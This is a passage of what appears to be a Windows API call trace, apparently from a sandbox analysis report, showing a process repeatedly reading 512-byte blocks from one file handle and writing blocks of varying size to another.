lpOverlapped=0x0) returned 1 [0024.410] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.411] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.411] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.412] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.412] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.413] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.413] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.414] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.414] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.414] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.415] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.415] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.416] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.417] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.418] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.418] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.419] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.421] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x303, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.422] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.423] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.433] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.435] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.436] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.436] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x304, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.443] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.444] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.445] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.445] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.446] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.447] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.448] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.449] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.450] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.451] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.451] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.452] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.453] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.454] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.454] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.455] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.456] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.456] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.457] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.457] WriteFile (in: hFile=0x2b4, 